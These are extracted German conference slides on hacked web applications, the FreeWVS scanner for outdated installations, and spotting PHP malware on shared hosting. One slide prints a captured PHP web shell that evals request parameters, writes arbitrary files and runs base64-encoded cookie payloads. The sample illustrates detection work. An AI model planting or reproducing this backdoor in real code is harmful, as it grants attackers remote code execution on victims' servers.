  • 5. Einleitung FreeWVS Gehackt Exkurs Ende Vorstellung Beispiel Motivation Veraltete Webanwendungen Konkretes Beispiel war ein Joomla 1.7.0, damals ca. 1 Jahr alt Derartige Vorkommnisse verst¨arkt seit etwa 2012, davor fast nie Alle(!) derartigen Ereignisse bei uns mit hoher Wahrscheinlichkeit aufgrund von veralteten Webanwendungen Fazit: Updaten bevor etwas passiert ist die beste Strategie Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  • 6. Einleitung FreeWVS Gehackt Exkurs Ende FreeWVS Schwierigkeiten beim Erkennen User informieren Entwicklung von FreeWVS Problem Webseiten heute FreeWVS erkennt Webanwendungen und Version auf Dateisystemebene Enth¨alt eine Datenbank mit jeweils letzter Sicherheitsl¨ucke (wenn m¨oglich CVE, sonst URL) und sicherer Version Unterscheidet nicht nach schwere der Sicherheitsl¨ucke, betrachtet nur jeweils j¨ungstes Problem Python, freie Software (CC0) https://source.schokokeks.org/freewvs/ Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  • 7. Einleitung FreeWVS Gehackt Exkurs Ende FreeWVS Schwierigkeiten beim Erkennen User informieren Entwicklung von FreeWVS Problem Webseiten heute Es gibt keine allgemeing¨ultige Strategie zum Erkennen von Webapps Versionsnummer nicht im Tarball, nur in Doku, nur gesplittet Seltsame Versionsnummernkonzepte (DokuWiki: 2013-12-08, auch schon gesehen: 1.2 neuer als 1.11) Oft unterschiedliche Erkennungsstrategien f¨ur unterschiedliche Major-Versionen Angenehm ist sowas: $wp version = ’3.8.2’; Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  • 8. Einleitung FreeWVS Gehackt Exkurs Ende FreeWVS Schwierigkeiten beim Erkennen User informieren Entwicklung von FreeWVS Problem Webseiten heute User k¨onnen sich wahlweise t¨aglich, w¨ochentlich oder monatlich informieren lassen Nicht abschaltbar! Problem: Wird h¨aufig ignoriert Vielen Usern nicht klar dass Webanwendungen betreut werden m¨ussen Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  • 9. Einleitung FreeWVS Gehackt Exkurs Ende FreeWVS Schwierigkeiten beim Erkennen User informieren Entwicklung von FreeWVS Problem Webseiten heute Bislang fast nur intern entwickelt, wenig Feedback von extern Update-Mechanismus nicht optimal (im Moment: svn up; make install) K¨onnten viel mehr Webanwendungen aufnehmen, insbesondere Plugins Patches welcome! Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  • 10. Einleitung FreeWVS Gehackt Exkurs Ende FreeWVS Schwierigkeiten beim Erkennen User informieren Entwicklung von FreeWVS Problem Webseiten heute Fr¨uher: Webdesigner erstellt HTML-Seite Zwischendurch: Webdesigner erstellt PHP Heute: Webdesigner erstellt Theme f¨ur einfach zu bedienende, kostenlose Webanwendungen Problem: Wer k¨ummert sich um Updates? Oft: Niemand L¨osung manchmal: HTML-Dump von CMS Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  • 11. Einleitung FreeWVS Gehackt Exkurs Ende Wenn es zu sp¨at ist PHP-Shell Von Hand erkennen Malware erkennen Offene Fragen Bei uns bislang keine Defacements via SQL-Injection oder geklauten Zugangsdaten beobachtet (wir benutzen schon immer SFTP) Nur: Spam, DDoS-Attacken und (am h¨aufigsten) abgelegte PHP-Shells Oft: Grund f¨ur Angriff unklar, PHP-Shell ”f¨ur sp¨ater” Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  • 12. Einleitung FreeWVS Gehackt Exkurs Ende Wenn es zu sp¨at ist PHP-Shell Von Hand erkennen Malware erkennen Offene Fragen $huqcyw = ”777564599393bc96823bdf64b6f221d5”; if(isset($ REQUEST[’epji’])) { $kumwnkyc = $ REQUEST[’epji’]; eval($kumwnkyc); exit(); } if(isset($ REQUEST[’qfwdstnd’])) { $rpjvrsf = $ REQUEST[’wuefsoa’]; $kopi = $ REQUEST[’qfwdstnd’]; $mzwjcpc = fopen($kopi, ’w’); $sshhbcz = fwrite($mzwjcpc, $rpjvrsf); fclose($mzwjcpc); echo $sshhbcz; exit(); eval ( base64 decode (”IGlmICggaXNz- ZXQoICRfQ09PS0lFWydkd2MnXSkgKSB7IGVjaG8gJzxjd2Q+ JyAuIGdldGN3ZCgpIC4gJzwvY3dkPic7IH0gaWYgKCBpc3Nld CAoICRfUE9TVFsncGU4MCddICkgKSB7IGV2YWwgKCBiYXNlNj RfZGVjb2RlICggJF9QT1NUWydwZTgwJ10gKSApOyByZXR1cm4 7IH0gIGlmICggaXNzZXQoICRfQ09PS0lFWydwZTgwJ10pICkg eyBldmFsICggYmFzZTY0X2RlY29kZSAoICRfQ09PS0lFWydwZ TgwJ10gKSApOyByZXR1cm47IH0g”) ); } Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  • 13. Einleitung FreeWVS Gehackt Exkurs Ende Wenn es zu sp¨at ist PHP-Shell Von Hand erkennen Malware erkennen Offene Fragen Kombinationen aus eval, gzinflate, base64 decode und ¨ahnlichem Problem: Oft auch sowas in legitimem PHP-Code (oft Themes) als Code-Obfuscation Decodieren: eval durch echo ersetzen Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  • 14. Einleitung FreeWVS Gehackt Exkurs Ende Wenn es zu sp¨at ist PHP-Shell Von Hand erkennen Malware erkennen Offene Fragen Webroots mit ClamAV scannen - erkennt viel, aber l¨angst nicht alles LinuxMalwareDetect (maldet) - etwas umst¨andlich in der Bedienung, aber erkennt einiges Auch einige propriet¨are Virenscanner f¨ur Linux verf¨ugbar, kostenlos meist nur zum privatgebrauch Problem: Erkennungsrate praktisch immer unter 50 % Erstes Codebeispiel von vorhin: damals 0 auf Virustotal, jetzt 1/51 Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  • 15. Einleitung FreeWVS Gehackt Exkurs Ende Wenn es zu sp¨at ist PHP-Shell Von Hand erkennen Malware erkennen Offene Fragen Strategien zur generischen Erkennung von PHP-Shells? Sollte nicht zu schwer sein, kenne aber keine Software. Wie / an wen Malware am besten reporten? Erkennen von Hacks in Form von Datenbankeintr¨agen / Artikeln / Defacements? Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  • 16. Einleitung FreeWVS Gehackt Exkurs Ende Sichere Webanwendungen Wenn ihr Webanwendungen programmiert: Benutzt Prepared Statements und Content Security Policy! Konsequent eingesetzt verhindern Prepared Statements alle SQL-Injections und Content Security Policy alle Cross Site Scripting-Fehler - Großteil aller Web-Vulnerabilities Fehlerklassen verhindern statt einzelne Fehler Aber: H¨atte in meisten F¨allen bei uns vermutlich nichts gen¨utzt (Probleme mit File Upload oder Remote Code Execution) Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware
  • 17. Einleitung FreeWVS Gehackt Exkurs Ende Schlussfolgerung Ein Großteil der Angriffe l¨asst sich durch aktuelle Software verhindern Angriffe verhindern ist immer besser als Angriffe sp¨ater erkennen M¨oglichkeiten angegriffene Webseiten zu finden unzuverl¨assig und unbefriedigend Hanno B¨ock, Lizenz: CC0 / Public Domain Gehackte Webapplikationen und Malware